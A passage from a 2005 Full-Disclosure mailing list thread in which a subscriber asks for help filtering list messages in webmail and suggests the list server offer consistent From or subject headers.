list server if you want modified froms or not (so people that does not likes that can be happy too). Would that be possible? I mean without much trouble for the admins. I guess it would be a good feature for the list that would help some ppl that have to deal with webmails and similars. I guess one solution for my problems could be to use the project at sourforge similar to yahoopops but for gmail (I don't remeber the exact name). Maybe that solves things for my desktop but then what if I'm not at my desktop. I receive hundreds of mails everyday form several lists so leaving them unsorted in gmail is a no no since that takes away your productivity. On the other side I cant install or execute some software on every computer I land. Thanks again to everyone Regards Waldo Alvarez Thanks, -Cory On Aug 19, 2005, at 7:15 PM, waldo alvarez wrote: Hi Folks: I'm just landed here recently because of an e-mail in bugtrack. You know curiosity can take you to strange places. And jejej this list is great. Non moderation simply makes it great. Now the problem is. I sort mail arriving to my mailbox by category using filters. Now the only common thing that applies to all mails here is the [Full-disclosure] text in the subject. Everything else is a caos. The from fields sometimes don't have the fulldisclosure address. And on the other side I tried to sort using that text in the subject but it doesn't work at all sometimes messages land in the Fulldiclosure folder I have for this list but sometimes they land straigth into my inbox. And there is a total caos having so much traffic this list. Could anybody that solved this before gimme a hand telling me the solution for this. In any case I think this list should work in that sense like the rest of the lists. Thanks in advance Waldo Alvarez ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
